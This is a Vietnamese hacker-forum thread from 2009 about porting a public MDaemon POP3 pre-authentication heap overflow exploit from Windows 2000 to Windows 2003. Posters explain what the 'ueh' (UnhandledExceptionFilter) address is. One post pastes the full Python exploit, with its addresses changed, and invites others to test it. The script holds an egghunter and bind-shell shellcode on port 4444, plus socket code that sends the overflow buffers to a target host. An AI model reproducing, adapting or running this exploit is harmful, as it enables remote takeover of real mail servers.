banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thủ thuật reverse engineering Cách tìm các địa chỉ ret & ueh để Exploit lỗi Remote Heap Overflow  XML
  [Question]   Cách tìm các địa chỉ ret & ueh để Exploit lỗi Remote Heap Overflow 15/02/2009 03:19:29 (+0700) | #1 | 169430
caube12345
Member

[Minus]    0    [Plus]
Joined: 27/03/2007 10:49:25
Messages: 5
Offline
[Profile] [PM]
Chào các bạn
Mình biết các hệ điều hành khác nhau thì có các địa chỉ ret và ueh của các chương trình khác nhau (vd ở đây là MDaemon chẳng hạn)
Vậy làm sao để tìm các địa chỉ ret và ueh trong chương trình MDaemon trên các hệ điều hành khác vậy
Đây là link Exploit MDaemon POP3 Server < 9.06 http://milw0rm.com/exploits/2258 trên hệ điều hành Windows 2k
Mình đang tìm địa chỉ ret và ueh trên hệ điều hành Windows 2003
À địa chỉ ueh trong này là địa chỉ gì vậy ai biết trả lời giúp nhé.
[Up] [Print Copy]
  [Question]   Re: Cách tìm các địa chỉ ret & ueh để Exploit lỗi Remote Heap Overflow 15/02/2009 03:47:01 (+0700) | #2 | 169433
TQN
Elite Member

[Minus]    0    [Plus]
Joined: 29/06/2006 22:28:01
Messages: 888
Location: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
ueh là gì vậy, tui mới nghe lần đầu.
[Up] [Print Copy]
  [Question]   Re: Cách tìm các địa chỉ ret & ueh để Exploit lỗi Remote Heap Overflow 15/02/2009 04:00:04 (+0700) | #3 | 169435
lamer
Elite Member

[Minus]    0    [Plus]
Joined: 26/02/2008 13:28:49
Messages: 215
Offline
[Profile] [PM]
UserExceptionHandler đó bác TQN.
[Up] [Print Copy]
  [Question]   Re: Cách tìm các địa chỉ ret & ueh để Exploit lỗi Remote Heap Overflow 15/02/2009 04:07:14 (+0700) | #4 | 169438
caube12345
Member

[Minus]    0    [Plus]
Joined: 27/03/2007 10:49:25
Messages: 5
Offline
[Profile] [PM]

lamer wrote:
UserExceptionHandler đó bác TQN. 


Thế à, cảm ơn nhiều smilie

ueh = struct.pack("<L",0x7C54144C) # SetUnhandledExceptionFilter 0x7C54144C win2k SP4 No Patches

thấy thế mình tưởng uef mới đúng chứ
mà cách tìm địa chỉ đó trong Windows Server 2k3 có ai biết ko?

[Up] [Print Copy]
  [Question]   Re: Cách tìm các địa chỉ ret & ueh để Exploit lỗi Remote Heap Overflow 15/02/2009 10:10:03 (+0700) | #5 | 169485
TQN
Elite Member

[Minus]    0    [Plus]
Joined: 29/06/2006 22:28:01
Messages: 888
Location: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
UserExceptionHandler hay UnhandledExceptionHandler ?
[Up] [Print Copy]
  [Question]   Re: Cách tìm các địa chỉ ret & ueh để Exploit lỗi Remote Heap Overflow 16/02/2009 09:51:05 (+0700) | #6 | 169596
lamer
Elite Member

[Minus]    0    [Plus]
Joined: 26/02/2008 13:28:49
Messages: 215
Offline
[Profile] [PM]
À ừ, đúng rồi. Cái bác TQN nói là cái chính xác đó.

Cái này là cái default handler mà nếu cái exception đó không được thằng nào handle. Bình thường thì nó là Dr Watson đó.
[Up] [Print Copy]
  [Question]   Re: Cách tìm các địa chỉ ret & ueh để Exploit lỗi Remote Heap Overflow 16/02/2009 15:12:50 (+0700) | #7 | 169623
caube12345
Member

[Minus]    0    [Plus]
Joined: 27/03/2007 10:49:25
Messages: 5
Offline
[Profile] [PM]
UnhandledExceptionHandler hay SetUnhandledExceptionFilter ? smilie
Mình đã tìm ra đc 2 cái địa chỉ đó rồi(chắc là đúng vì khi test trên Windows 2k3 Server có cài MDaemon thì ko thấy bị lỗi tắt chương trình nữa mà MDaemon vẫn chạy bình thường) nhưng mà sao port 4444 ko mở nhỉ smilie
Đưa code copy bên milw0rm lên đây luôn,thay đổi địa chỉ ret và ueh rồi
Code:
#!/usr/bin/python
import sys
import struct
import socket
from time import sleep
########################################################################################
# MDaemon Pre Authentication (USER) Heap Overflow 
# Code based on Leon Juranic's exploit
# Coded by muts - <a href="mailto:mati@see-security.com">mati@see-security.com</a>
# http://www.hackingdefined.com
# http://www.remote-exploit.org
# Tested on:
# 	Mdaemon 9.0.5
# 	Mdaemon 7.2.3
# 	Mdaemon 7.2.2
# 	Mdaemon 7.2.1
# 	Mdaemon 7.2.0
#		Possibly Others
#		PLEASE CONTINUE READING !
# Huge greets to xbxice and talz for leading me away from the darkness
########################################################################################
# Mdaemon is wierd. It seems like their developers decided to annoy everyone
# by making their software do unexpected things.
# The exploit overwrites UnhandledExceptionFilter, and jumps to an egghunter
# shellcode - which then scans the memory, and executes a bindshell on port 4444.
# 
# On some Win2k SP4 machines, I found SetUnhandledExceptionFilter at 0x00000214,
# for which I unfortunately had no explenation. 
# I later found out that these machines were fully patched ...
# After inspecting kernel32.dll from my SP4 (not fully patched) and comparing it to 
# todays' version, I noticed that the SetunhandledExceptionFilter function had changed, 
# and looks suspiciously similar to XP SP2... 
# Note that my unpatched win2k was last patched 2-3 weeks ago, 
# so I suspect this change is recent.
# The end of easy UnhandledExceptionFilter exploitation on Win2k ?
#
# So, this is a partially working exploit, on unpatched win2k boxes....
# Kiddies, treat this exploit as DOS :)
#
# I got 3 types of results with this code:
#
# 1. Shell :)	
# 2. Mdaemon process shoots up to 100%, scanning memory for shellcode that isn't there.
# 3. Plain ugly crash - oh well.
#
# At minimum, I'de check the UnhandledExceptionFilter address before running the exploit.
######################################################################################## 
# 
# C:\Documents and Settings\muts>nc -v 192.168.220.128 4444
# 97DACBEC7CA4483 [192.168.220.128] 4444 (?) open
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
# 
# C:\MDaemon\APP>
########################################################################################

host="192.168.1.4"

ret = struct.pack("<L",0x7D5BB5)	# 7c2f62b6 advapi.dll JMP ESI+48 SP4 No Patches <-- chỗ này mình mới đổi thành địa chỉ 007D5BB5
ueh = struct.pack("<L",0x7C1F1CE)	# SetUnhandledExceptionFilter 0x7C54144C win2k SP4 No Patches <--- chỗ này cũng thế 0x7C1F1CE
tap = struct.pack("<L",0xeb169090)  	# Short Jump over some garbage

# skape's egghunter shellcode 

egghunter  ="\xeb\x21\x59\xb8\x74\x30\x30\x77\x51\x6a\xff\x33\xdb\x64\x89\x23"
egghunter +="\x6a\x02\x59\x8b\xfb\xf3\xaf\x75\x07\xff\xe7\x66\x81\xcb\xff\x0f"
egghunter +="\x43\xeb\xed\xe8\xda\xff\xff\xff\x6a\x0c\x59\x8b\x04\x0c\xb1\xb8"
egghunter +="\x83\x04\x08\x06\x58\x83\xc4\x10\x50\x33\xc0\xc3"

# win32_bind -  EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum

shellcode  ="\x90\x90\x74\x30\x30\x77\x74\x30\x30\x77" # t00wt00w (!)
shellcode +="\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
shellcode +="\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
shellcode +="\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
shellcode +="\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
shellcode +="\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x56\x4b\x4e"
shellcode +="\x4d\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x38"
shellcode +="\x4e\x46\x46\x52\x46\x42\x4b\x48\x45\x34\x4e\x53\x4b\x48\x4e\x57"
shellcode +="\x45\x50\x4a\x47\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x48"
shellcode +="\x4f\x45\x42\x52\x41\x30\x4b\x4e\x49\x34\x4b\x58\x46\x33\x4b\x48"
shellcode +="\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x38\x42\x4c"
shellcode +="\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
shellcode +="\x46\x4f\x4b\x53\x46\x45\x46\x32\x4a\x52\x45\x37\x45\x4e\x4b\x38"
shellcode +="\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x36\x4b\x58\x4e\x30\x4b\x54"
shellcode +="\x4b\x58\x4f\x45\x4e\x31\x41\x50\x4b\x4e\x43\x50\x4e\x42\x4b\x38"
shellcode +="\x49\x58\x4e\x46\x46\x52\x4e\x31\x41\x46\x43\x4c\x41\x53\x4b\x4d"
shellcode +="\x46\x56\x4b\x58\x43\x44\x42\x33\x4b\x48\x42\x54\x4e\x30\x4b\x38"
shellcode +="\x42\x57\x4e\x51\x4d\x4a\x4b\x58\x42\x54\x4a\x50\x50\x45\x4a\x46"
shellcode +="\x50\x48\x50\x34\x50\x30\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x56"
shellcode +="\x43\x35\x48\x46\x4a\x56\x43\x43\x44\x43\x4a\x36\x47\x47\x43\x57"
shellcode +="\x44\x33\x4f\x45\x46\x45\x4f\x4f\x42\x4d\x4a\x46\x4b\x4c\x4d\x4e"
shellcode +="\x4e\x4f\x4b\x53\x42\x55\x4f\x4f\x48\x4d\x4f\x55\x49\x38\x45\x4e"
shellcode +="\x48\x36\x41\x58\x4d\x4e\x4a\x30\x44\x30\x45\x55\x4c\x36\x44\x50"
shellcode +="\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x55"
shellcode +="\x4f\x4f\x48\x4d\x43\x45\x43\x55\x43\x45\x43\x35\x43\x55\x43\x34"
shellcode +="\x43\x45\x43\x44\x43\x45\x4f\x4f\x42\x4d\x48\x36\x4a\x56\x41\x51"
shellcode +="\x4e\x35\x48\x46\x43\x35\x49\x38\x41\x4e\x45\x39\x4a\x46\x46\x4a"
shellcode +="\x4c\x51\x42\x37\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x36\x42\x51"
shellcode +="\x41\x35\x45\x55\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x42"
shellcode +="\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x35\x45\x55\x4f\x4f\x42\x4d"
shellcode +="\x4a\x46\x45\x4e\x49\x44\x48\x48\x49\x34\x47\x55\x4f\x4f\x48\x4d"
shellcode +="\x42\x35\x46\x35\x46\x35\x45\x45\x4f\x4f\x42\x4d\x43\x49\x4a\x56"
shellcode +="\x47\x4e\x49\x57\x48\x4c\x49\x47\x47\x55\x4f\x4f\x48\x4d\x45\x45"
shellcode +="\x4f\x4f\x42\x4d\x48\x56\x4c\x56\x46\x56\x48\x56\x4a\x46\x43\x46"
shellcode +="\x4d\x46\x49\x38\x45\x4e\x4c\x46\x42\x55\x49\x55\x49\x32\x4e\x4c"
shellcode +="\x49\x38\x47\x4e\x4c\x36\x46\x34\x49\x58\x44\x4e\x41\x33\x42\x4c"
shellcode +="\x43\x4f\x4c\x4a\x50\x4f\x44\x34\x4d\x52\x50\x4f\x44\x34\x4e\x42"
shellcode +="\x43\x59\x4d\x58\x4c\x57\x4a\x53\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56"
shellcode +="\x44\x37\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x47\x46\x44\x4f\x4f"
shellcode +="\x48\x4d\x4b\x35\x47\x45\x44\x55\x41\x55\x41\x55\x41\x55\x4c\x56"
shellcode +="\x41\x50\x41\x45\x41\x35\x45\x45\x41\x55\x4f\x4f\x42\x4d\x4a\x56"
shellcode +="\x4d\x4a\x49\x4d\x45\x50\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x46"
shellcode +="\x4f\x4f\x4f\x4f\x47\x43\x4f\x4f\x42\x4d\x4b\x58\x47\x55\x4e\x4f"
shellcode +="\x43\x38\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x35\x4f\x4f\x42\x4d"
shellcode +="\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x35\x43\x55\x4f\x4f\x48\x4d"
shellcode +="\x4f\x4f\x42\x4d\x5a"

buffer ="AAA"+tap+"BBBB"+ret+ueh+"\x90"*90 +egghunter+"C"*346

for x in range(5):
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((host,110))
	data=s.recv(1024)
	print data
	s.send('USER '+'@A' * 1600 + '\x90'*5945 + shellcode +'D'*3711 + '\r\n') 
	s.send('QUIT\r\n')
	s.close()
	sleep(1)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,110))
data=s.recv(1024)
print data
s.send('USER ' + '@A@A'+ buffer + '\r\n')
data=s.recv(1024)
print data
s.send('USER ' + 'A' * 3370 + '\r\n')
s.close()

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,110))
data=s.recv(1024)
print data
s.send('USER ' + '@A@A'+ buffer + '\r\n')
data=s.recv(1024)
print data
s.send('USER ' + 'A' * 3370 + '\r\n')
s.close()
sleep(1)

# milw0rm.com [2006-08-26]


Ai có hứng thú thì test coi thử có dc ko nhé.



[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|